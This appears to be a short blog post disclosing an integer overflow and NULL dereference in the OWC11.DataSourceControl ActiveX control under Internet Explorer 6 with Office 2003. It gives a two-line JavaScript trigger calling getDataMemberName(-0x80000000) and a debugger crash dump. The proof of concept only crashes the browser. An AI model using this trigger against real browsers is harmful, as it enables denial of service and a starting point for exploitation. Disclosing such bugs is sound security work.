The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a negative large integer value results in an integer overflow and a NULL dereference.
var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);
Demonstration
eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????
This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment